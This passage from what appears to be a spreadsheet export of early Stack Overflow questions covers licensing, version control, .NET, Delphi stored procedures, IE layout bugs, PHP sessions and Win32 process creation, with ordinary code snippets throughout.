But other than that, why are there so many licenses out there? Is there any &lt;strong&gt;major&lt;/strong&gt; difference between them. How do I go about choosing the right one for me?&lt;/p&gt;
&lt;p&gt;To not make this too general and complicated I'll just throw in some licenses here and you guys can tell me what's the main point of each&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;gpl (v2/v3)&lt;/li&gt;
&lt;li&gt;Apache license&lt;/li&gt;
&lt;li&gt;BSD license&lt;/li&gt;
&lt;li&gt;The MIT license&lt;/li&gt;
&lt;li&gt;The mozilla license&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Edit: 
(Pointed out to me, by 3 people, no less) whether or not a license allows a user to use the software in a commercial software is covered &lt;a href="http://stackoverflow.com/questions/137048/how-do-i-tell-if-i-can-re-use-a-free-software-library-in-a-commercial-app"&gt;in this question&lt;/a&gt;. But, as stated, I'm also looking if someone can shed light on the difference other than that. In context of choosing one for my own project rather than in the context of whether or not I can use the software within my own commercial software ( like I believe the other thread is about )&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to add a Subversion section to the right click menu for TextMate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to be able to click on a file to revert it, or check in a directory, etc.  It would be much more convenient to have these available from the right click menu.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the dangers of making a method virtual?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been doing some mocking with RhinoMocks and it requires that mocked methods be made virtual. This is fine except we have a custom framework which contains the methods that I want to mock which are currently not marked as virtual.&lt;/p&gt;
&lt;p&gt;I can't forsee any problem with making these methods virtual but I was wondering what are some potential dangers of making methods virtual that I should look out for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Could a truly random number be generated using pings to psuedo-randomly selected IP addresses?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The question posed came about during a 2nd Year Comp Science lecture while discussing the impossibility of generating numbers in a deterministic computational device.&lt;/p&gt;
&lt;p&gt;This was the only suggestion which didn't depend on non-commodity-class hardware.&lt;/p&gt;
&lt;p&gt;Subsequently nobody would put their reputation on the line to argue definitively for or against it.  &lt;/p&gt;
&lt;p&gt;Anyone care to make a stand for or against.  If so, how about a mention as to a possible implementation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any way in .NET to programmatically listen to HTTP traffic?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using browser automation for testing web sites but I need to verify HTTP requests from the browser (i.e., images, external scripts, XmlHttpRequest objects). Is there a way to programmatically instantiate a proxy for the browser to use in order to see what its sending?&lt;/p&gt;
&lt;p&gt;I'm already using Fiddler to watch the traffic but I want something that's UI-less that I can use in continuous build integration.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NLP: Building (small) corpora, or "Where to get lots of not-too-specialized English-language text files?"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have a suggestion for where to find archives or collections of everyday English text for use in a small corpus?  I have been using Gutenberg Project books for a working prototype, and would like to incorporate more contemporary language.  A &lt;a href="http://stackoverflow.com/questions/122595/nlp-qualitatively-positive-vs-negative-sentence#126378"&gt;recent answer&lt;/a&gt; here pointed indirectly to a great &lt;a href="http://us.imdb.com/Reviews/" rel="nofollow"&gt;archive of usenet movie reviews&lt;/a&gt;, which hadn't occurred to me, and is very good.  For this particular program technical usenet archives or programming mailing lists would tilt the results and be hard to analyze, but any kind of general blog text, or chat transcripts, or anything that may have been useful to others, would be very helpful.  Also, a partial or downloadable research corpus that isn't too marked-up, or some heuristic for finding an appropriate subset of wikipedia articles, or any other idea, is very appreciated.&lt;/p&gt;
&lt;p&gt;(BTW, I am being a good citizen w/r/t downloading, using a deliberately slow script that is not demanding on servers hosting such material, in case you perceive a moral hazard in pointing me to something enormous.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;:  User S0rin points out that wikipedia requests no crawling and provides &lt;a href="http://en.wikipedia.org/wiki/Special:Export" rel="nofollow"&gt;this export tool&lt;/a&gt; instead.  Project Gutenberg has a policy specified &lt;a href="http://www.gutenberg.org/wiki/Gutenberg:Information%5FAbout%5FRobot%5FAccess%5Fto%5Four%5FPages" rel="nofollow"&gt;here&lt;/a&gt;, bottom line, try not to crawl, but if you need to: "Configure your robot to wait at least 2 seconds between requests."&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE 2&lt;/strong&gt;  The wikpedia dumps are the way to go, thanks to the answerers who pointed them out.  I ended up using the English version from here: &lt;a href="http://download.wikimedia.org/enwiki/20090306/" rel="nofollow"&gt;http://download.wikimedia.org/enwiki/20090306/&lt;/a&gt; , and a Spanish dump about half the size.  They are some work to clean up, but well worth it, and they contain a lot of useful data in the links.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between a worker thread and an I/O thread?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Looking at the processmodel element in the Web.Config there are two attributes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;maxWorkerThreads="25" 
maxIoThreads="25"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the difference between worker threads and I/O threads?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is my stored procedure receiving a null parameter?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, this is a curly one. I'm working on some Delphi code that I didn't write, and I'm encountering a very strange problem. One of my stored procedures' parameters is coming through as &lt;code&gt;null&lt;/code&gt;, even though it's definitely being sent &lt;code&gt;1&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The Delphi code uses a TADOQuery to execute the stored procedure (anonymized):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; ADOQuery1.SQL.Text := "exec MyStoredProcedure :Foo,:Bar,:Baz,:Qux,:Smang,:Jimmy";
 ADOQuery1.Parameters.ParamByName("Foo").Value := Integer(someFunction()); 
 // other parameters all set similarly
 ADOQuery1.ExecSQL;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;Integer(SomeFunction())&lt;/code&gt; currently always returns 1 - I checked with the debugger.&lt;/p&gt;
&lt;p&gt;However, in my stored proc ( altered for debug purposes ):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;create procedure MyStoredProcedure (
    @Foo int, @Bar int, @Baz int,
    @Qux int, @Smang int, @Jimmy varchar(20) 
) as begin
    -- temp debug
    if ( @Foo is null ) begin
        insert into TempLog values ( "oh crap" )
    end
    -- do the rest of the stuff here..
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;TempLog&lt;/code&gt; does indeed end up with "oh crap" in it (side question: there must be a better way of debugging stored procs: what is it?).&lt;/p&gt;
&lt;p&gt;Here's an example trace from profiler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;exec [MYDB]..sp_procedure_params_rowset N'MyStoredProcedure',1,NULL,NULL
declare @p3 int
set @p3=NULL
exec sp_executesql 
    N'exec MyStoredProcedure @P1,@P2,@P3,@P4,@P5,@P6',
    N'@P1 int OUTPUT,@P2 int,@P3 int,@P4 int,@P5 int,@P6 int',
    @p3 output,1,1,1,0,200
select @p3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This looks a little strange to me. Notice that it's using @p3 &lt;em&gt;and&lt;/em&gt; @P3 - could this be causing my issue?    &lt;/p&gt;
&lt;p&gt;The other strange thing is that it seems to depend on which TADOConnection I use.    &lt;/p&gt;
&lt;p&gt;The project is a dll which is passed a TADOConnection from another application. It calls all the stored procedures using this connection.&lt;/p&gt;
&lt;p&gt;If instead of using this connection, I first do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ConnectionNew := TADOQuery.Create(ConnectionOld.Owner);
ConnectionNew.ConnectionString := ConnectionOld.ConnectionString;
TADOQuery1.Connection := ConnectionNew;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then the issue does not occur! The trace from this situation is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;exec [MYDB]..sp_procedure_params_rowset N'MyStoredProcedure',1,NULL,NULL
declare @p1 int
set @p1=64
exec sp_prepare @p1 output,
    N'@P1 int,@P2 int,@P3 int,@P4 int,@P5 int,@P6 varchar(20)',
    N'exec MyStoredProcedure @P1,@P2,@P3,@P4,@P5,@P6',
    1
select @p1
SET FMTONLY ON exec sp_execute 64,0,0,0,0,0,' ' SET FMTONLY OFF
exec sp_unprepare 64
SET NO_BROWSETABLE OFF
exec sp_executesql 
    N'exec MyStoredProcedure @P1,@P2,@P3,@P4,@P5,@P6',
    N'@P1 int,@P2 int,@P3 int,@P4 int,@P5 int,@P6 varchar(20)',
    1,1,1,3,0,'400.00'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is a bit much for lil ol' me to follow, unfortunately. What sort of TADOConnection options could be influencing this?&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; &lt;a href="http://stackoverflow.com/questions/137530/why-is-my-stored-procedure-receiving-a-null-parameter#177214"&gt;Update below&lt;/a&gt; (didn't want to make this question any longer :P)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best web based Subversion client?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is your favorite web-based svn client? I'd like one that supports commits via the web.&lt;/p&gt;
&lt;p&gt;One tool per post please! Please include platform and notable features (e.g. read-write support).&lt;/p&gt;
&lt;p&gt;I'm referring to browser-based clients that users would go to like any other website--not accessing the repo via http.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is programming a subset of math?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've heard many times that all programming is really a subset of math. &lt;a href="http://c2.com/cgi-bin/wiki?ProgrammingIsMath"&gt;Some suggest&lt;/a&gt; that OO, at its roots, is mathematically based, but I don't get the connection, aside from some obvious examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;using induction to prove a recursive algorithm,&lt;/li&gt;
&lt;li&gt;formal correctness proofs,&lt;/li&gt;
&lt;li&gt;functional languages,&lt;/li&gt;
&lt;li&gt;lambda calculus,&lt;/li&gt;
&lt;li&gt;asymptotic complexity,&lt;/li&gt;
&lt;li&gt;DFAs, NFAs, Turing Machines, and theoretical computation in general,&lt;/li&gt;
&lt;li&gt;and the fact that everything on the box is binary.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I know math is very important to programming, but I struggle with this "subset" view.  In what ways is programming a subset of math?&lt;/p&gt;
&lt;p&gt;I'm looking for an explanation that might have relevance to enterprise/OO development, if there is a strong enough connection, that is.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I perform a HEAD request with the mechanize library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know how to do a HEAD request with httplib, but I have to use mechanize for this site. &lt;/p&gt;
&lt;p&gt;Essentially, what I need to do is grab a value from the header (filename) without actually downloading the file.&lt;/p&gt;
&lt;p&gt;Any suggestions how I could accomplish this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Encapsulating SQL in a named_scope</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering if there was a way to use "find_by_sql" within a named_scope. I'd like to treat custom sql as named_scope so I can chain it to my existing named_scopes. It would also be good for optimizing a sql snippet I use frequently.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where does Console.WriteLine go in ASP.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a J2EE application (like one running in WebSphere), when I use &lt;code&gt;System.out.println()&lt;/code&gt;, my text goes to standard out, which is mapped to a file by the WebSphere admin console.&lt;/p&gt;
&lt;p&gt;In an ASP.NET application (like one running in IIS), where does the output of &lt;code&gt;Console.WriteLine()&lt;/code&gt; go?  The IIS process must have a stdin, stdout and stderr; but is stdout mapped to the Windows version of /dev/null or am I missing a key concept here?&lt;/p&gt;
&lt;p&gt;I'm &lt;strong&gt;not asking&lt;/strong&gt; if I should log there (I use log4net), but where does the output go?  My best info came from this &lt;a href="http://www.velocityreviews.com/forums/t91075-where-does-consolewriteline-goto.html"&gt;discussion&lt;/a&gt; where they say &lt;code&gt;Console.SetOut()&lt;/code&gt; can change the &lt;code&gt;TextWriter&lt;/code&gt;, but it still didn't answer the question on what the initial value of the Console is, or how to set it in config/outside of runtime code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which distro of Linux is best suited for Java web apps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are so many Linux distributions to choose from!  What is the "best" linux flavor for a web hosting environment running primarily:
Apache HTTP, Tomcat or JBoss, MySQL and Alfresco (not necessarily all in the same instance).&lt;/p&gt;
&lt;p&gt;Are there any significant differences in terms of ease of administration and configuration, performance and stability for such applications, etc.?&lt;/p&gt;
&lt;p&gt;What would you recommend?&lt;/p&gt;
&lt;p&gt;Thanks!
Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I upload a HTML form with a username, password, multiple file uploads and then process it with PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to post a username, password and multiple binary files from a single html form and process it using php? I'm not allowed to use ajax.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moving WCF service from IIS to a Windows service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an existing WCF service that makes use of wsDualHttpBinding to enable callbacks to the client. I am considering moving it to netTcpBinding for better performance, but I'm quite wary of moving away from the IIS-hosted service (a "comfort zone" we currently enjoy) into having our own Windows service to host it. I was hoping we could still host this on IIS 7 but Win2K8 won't be reality for us for some time.&lt;/p&gt;
&lt;p&gt;What things should I watch out for when creating our own Windows service to host our WCF service? Things like lifetime management and request throttling are features that come free with IIS hosting so I'd also like to know how we can effectively host our service on our own without the convenience of having IIS do the hard work for us. Thanks! :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to change directory security attributes using InstallShield?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to change the security attribute of a directory that InstallShield creates under the &lt;code&gt;CSIDL_COMMON_APPDATA&lt;/code&gt; - can someone please advise on how to do that during the installation process?&lt;/p&gt;
&lt;p&gt;It's a script-defined folder.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you automate Firefox from C# application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Start with the simplest task of capturing the URL in Firefox from a C# application.  It appears using user32.dll Windows API functions will not work as is the approach for capturing the URL within IE.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does cherrypy handle user threads?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a django app right and I'm using cherrypy as the server. Cherrypy creates a new thread for every page view. I'd like to be able to access all of these threads (threads responsible for talking to django) from within any of them. More specifically I'd like to be able to access the thread_data for each of these threads from within any of them. Is this possible? If so, how do I do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make XMLHttpRequest work over HTTPS on Firefox?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I try to send an HTTP GET request through XMLHttpRequest it works on non-secure HTTP.&lt;/p&gt;
&lt;p&gt;But when sent over HTTPS, different browsers gave different results:&lt;/p&gt;
&lt;p&gt;On Firefox 3.0.2:
- The GET request doesn't reach the web server.&lt;/p&gt;
&lt;p&gt;On IE 7:
- The GET request reached the web server.&lt;/p&gt;
&lt;p&gt;Does this have something to do with Firefox 3 getting stricter with untrusted certificates?
Is there a way around this?&lt;/p&gt;
&lt;p&gt;I've already added the URL as an exception in Firefox's Certificate Manager.
The error console doesn't report any error.
I've added a try-catch around XMLHttpRequest's open() and send.  No exception is thrown.&lt;/p&gt;
&lt;p&gt;Using both absolute and relative URL path doesn't work.&lt;/p&gt;
&lt;p&gt;Here's the code snippet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    var xmlHttp;
    try
    {
        // Firefox, Opera 8.0+, Safari
        xmlHttp=new XMLHttpRequest();
    }
    catch (e)
    {
        // Internet Explorer
        try
        {
            xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
        }
        catch (e)
        {
            try
            {
                xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
            }
            catch (e)
            {
                return false;
            }
        }
    }
    // we won't be handling any HTTP response
    xmlHttp.onreadystatechange=function()
    {
        // do nothing..
    }
    // send HTTP GET request
    try
    {
        xmlHttp.open("GET", "/[relative path to request]", true);
        xmlHttp.send(null);
    }
    catch (e)
    {
        alert('Error sending HTTP GET request!');
        return false;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks,
Kenneth&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create a resizable CDialog in MFC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to create a dialog based application, instead of old CFormView type of design. But CDialog produces fixed-size dialogs. How can I create dialog based applications with resizable dialogs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TFS Build Server drop location error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're using TFS Build Server to ensure that all files checked in by developers are going to compile to a working source tree, cuz there's nothing worse than a broken build!&lt;/p&gt;
&lt;p&gt;Anyway we've having some problems with the drop location that Build Server wants to use, we keep getting this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;TFS209011: Could not create drop location \build-server\drops\project\BuildNumber. No more connections can be mades to this remote computer at this time because there are already as many connections as the computer can accept&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Since this is being used in a pilot program at the moment we only have 2 projects which are using the Build Server. I've checked the network share and the allowed number of connections is about 100 so I don't really get what the problem is.&lt;/p&gt;
&lt;p&gt;Only occationally does the problem raise it's head, quite often we'll not have one for days, and then we'll have a bunch in a row.&lt;/p&gt;
&lt;p&gt;I can't seem to find much info on this either.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Emulate hard disk in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to emulate a disk drive in .NET, intercepting read/write/lock operations?&lt;br /&gt;
I would like to create something with a front-end similar to &lt;a href="http://en.wikipedia.org/wiki/GMail_Drive" rel="nofollow"&gt;GMail Drive&lt;/a&gt; in C#.&lt;/p&gt;
&lt;p&gt;Thanks,
Tom&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I read the RGB value of a given pixel in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I open an image with &lt;code&gt;open("image.jpg")&lt;/code&gt;, how can I get the RGB values of a pixel, if I have the coordinates of the pixel?&lt;/p&gt;
&lt;p&gt;Then how can I do the reverse of this? Starting with a blank graphic, 'write' a pixel with a certain RGB value?&lt;/p&gt;
&lt;p&gt;It would be so much better if I didn't have to download any additional libraries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I improve CVS performance in a multi-site scenario?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working in a project with developers working on three sites. One of the sites is in Delhi, India while the other two are in Europe. The communication between the European offices and the office in Delhi has poor bandwidth and quite bad latency, and a CVS update from there often takes 5-10 minutes even though only a few files have changed.&lt;/p&gt;
&lt;p&gt;Is there any good CVS proxies out there, or any neat way of keeping separate CVS servers in sync? Do you have any other tips on how the performance can be improved in this scenario?&lt;/p&gt;
&lt;p&gt;Unfortunately, we will be stuck with CVS during the scope of this project, so switching to something completely different is not an option in the short-term.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to register file types/extensions with a WiX installer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I didn't find an explicit answer to this question in the WiX Documentation (or Google, for that matter). Of course I could just write the appropriate registry keys in HKCR, but it makes me feel dirty and I'd expect this to be a standard task which should have a nice default solution.&lt;/p&gt;
&lt;p&gt;For bonus points, I'd like to know how to make it "safe", i.e. don't overwrite existing registrations for the file type and remove the registration on uninstall only if it has been registered during installation and is unchanged.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compress Script Resources of ASP.Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you compress Script Resources of ASP.Net? I saw a file there reached up to 255 KB! I tried finding solutions, but so far it only talks about scripting dynamic and static files. I checked the compression temp folder of IIS and found no compressed scripted resource there. That led me to the conclusion that these files are transferred over with high bandwidth.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Initializing a static std::map&lt;int, int&gt; in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the right way of initializing a static map? Do we need a static function that will initialize it? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How unique is the php session id</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How unique is the php session id? I got the impression from various things that I've read that I should not rely on two users never getting the same sessionid. Isn't it a GUID?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vim extension (via Python)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;is it possible to extend vim functionality via custom extension (preferably, written in Python)?&lt;/p&gt;
&lt;p&gt;What I need ideally is custom command when in command mode. E.g.&lt;/p&gt;
&lt;p&gt;ESC&lt;/p&gt;
&lt;p&gt;:do_this&lt;/p&gt;
&lt;p&gt;:do_that&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE6 freezes due to *server* configuration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our web site (running Rails) freezes IE6 nearly every time. The same code, deployed on a different server, does not freeze IE6. Where and how should we start tracking this down?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DIV with overflow:auto and a 100% wide table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hope someone might be able to help me here. I've tried to simplify my example as best I can.&lt;/p&gt;
&lt;p&gt;I have an absolutely positioned DIV, which for this example I've made fill the browser window. This div has the overflow:auto attribute to provide scroll bars when the content is too big for the DIV to display.&lt;/p&gt;
&lt;p&gt;Within the DIV I have a table to present some data, and it's width is 100%.&lt;/p&gt;
&lt;p&gt;When the content becomes too large vertically, I expect the vertical scroll bar to appear and the table to shrink horizontally slightly to accommodate the scroll bar. However in IE7 what happens is the horizontal scroll bar also appears, despite there still being enough space horizontally for all the content in the div.&lt;/p&gt;
&lt;p&gt;This is IE specific - firefox works perfectly.&lt;/p&gt;
&lt;p&gt;Full source below. Any help greatly appreciated.&lt;/p&gt;
&lt;p&gt;Tony&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
                      "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
&amp;lt;html xmlns="http://www.w3.org/1999/xhtml"&amp;gt;
&amp;lt;head runat="server"&amp;gt;
    &amp;lt;title&amp;gt;Table sizing bug?&amp;lt;/title&amp;gt;
    &amp;lt;style&amp;gt;
        #maxsize
        {
            position: absolute;
            left: 5px;
            right: 5px;
            top: 5px;
            bottom: 5px;
            border: 5px solid silver;
            overflow: auto;
        }
    &amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;form id="form1" runat="server"&amp;gt;
    &amp;lt;div id="maxsize"&amp;gt;
        &amp;lt;p&amp;gt;This will be fine until such time as the vertical size forces a
           vertical scroll bar. At this point I'd expect the table to re-size
           to now take into account of the new vertical scroll bar. Instead,
           IE7 keeps the table the full size and introduces a horizontal
           scroll bar.
        &amp;lt;/p&amp;gt;
        &amp;lt;table width="100%" cellspacing="0" cellpadding="0" border="1"&amp;gt;
        &amp;lt;tbody&amp;gt;
            &amp;lt;tr&amp;gt;
                &amp;lt;td&amp;gt;A&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;B&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;C&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;D&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;E&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;F&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;G&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;H&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;I&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;J&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;K&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;L&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;M&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;N&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;O&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;P&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;Q&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;R&amp;lt;/td&amp;gt;
            &amp;lt;/tr&amp;gt;
        &amp;lt;/tbody&amp;gt;
        &amp;lt;/table&amp;gt;
        &amp;lt;p&amp;gt;Resize the browser window vertically so this content doesn't
           fit any more&amp;lt;/p&amp;gt;
        &amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;
        &amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;added 03/16/10...&lt;/strong&gt; thought it might be interesting to point out that GWT's source code points to this question in a comment... &lt;a href="http://www.google.com/codesearch/p?hl=en#MTQ26449crI/com/google/gwt/user/client/ui/ScrollPanel.java&amp;amp;q=%22hack%20to%20account%20for%20the%22%20scrollpanel&amp;amp;sa=N&amp;amp;cd=1&amp;amp;ct=rc&amp;amp;l=48"&gt;http://www.google.com/codesearch/p?hl=en#MTQ26449crI/com/google/gwt/user/client/ui/ScrollPanel.java&amp;amp;q=%22hack%20to%20account%20for%20the%22%20scrollpanel&amp;amp;sa=N&amp;amp;cd=1&amp;amp;ct=rc&amp;amp;l=48&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to resolve a .lnk in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to find out the file/directory name that a .lnk is pointing to using c#.&lt;/p&gt;
&lt;p&gt;What is the simplest way to do this?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GetExitCodeProcess() returns 128</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DLL that's loaded into a 3rd party parent process as an extension. From this DLL I instantiate external processes (my own) by using CreateProcess API. This works great in 99.999% of the cases but sometimes this suddenly fails and stops working permanently (maybe a restart of the parent process would solve this but this is undesirable and I don't want to recommend that until I solve the problem.) The failure is symptomized by external process not being invoked any more even though CreteProcess() doesn't report an error and by GetExitCodeProcess() returning 128. Here's the simplified version of what I'm doing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;STARTUPINFO si;
ZeroMemory(&amp;amp;si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi;
ZeroMemory(&amp;amp;pi, sizeof(pi));
if(!CreateProcess(
    NULL,   // No module name (use command line). 
    "&amp;lt;my command line&amp;gt;",
    NULL,   // Process handle not inheritable. 
    NULL,   // Thread handle not inheritable. 
    FALSE,  // Set handle inheritance to FALSE. 
    CREATE_SUSPENDED,  // Create suspended.
    NULL,   // Use parent's environment block. 
    NULL,   // Use parent's starting directory. 
    &amp;amp;si,    // Pointer to STARTUPINFO structure.
    &amp;amp;pi))   // Pointer to PROCESS_INFORMATION structure.
{
    // Handle error.
}
else
{
    // Do something.
    // Resume the external process thread.
    DWORD resumeThreadResult = ResumeThread(pi.hThread);
    // ResumeThread() returns 1 which is OK
    // (it means that the thread was suspended but then restarted)
    // Wait for the external process to finish.
    DWORD waitForSingelObjectResult =  WaitForSingleObject(pi.hProcess, INFINITE);
    // WaitForSingleObject() returns 0 which is OK.
    // Get the exit code of the external process.
    DWORD exitCode;
    if(!GetExitCodeProcess(pi.hProcess, &amp;amp;exitCode))
    {
        // Handle error.
    }
    else
    {
        // There is no error but exitCode is 128, a value that
        // doesn't exist in the external process (and even if it
        // existed it doesn't matter as it isn't being invoked any more)
        // Error code 128 is ERROR_WAIT_NO_CHILDREN which would make some
        // sense *if* GetExitCodeProcess() returned FALSE and then I were to
        // get ERROR_WAIT_NO_CHILDREN with GetLastError()
    }
    // PROCESS_INFORMATION handles for process and thread are closed.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;External process can be manually invoked from Windows Explorer or command line and it starts just fine on its own. Invoked like that it, before doing any real work, creates a log file and logs some information about it. But invoked like described above this logging information doesn't appear at all so I'm assuming that the main thread of the external process never enters main() (I'm testing that assumption now.)&lt;/p&gt;
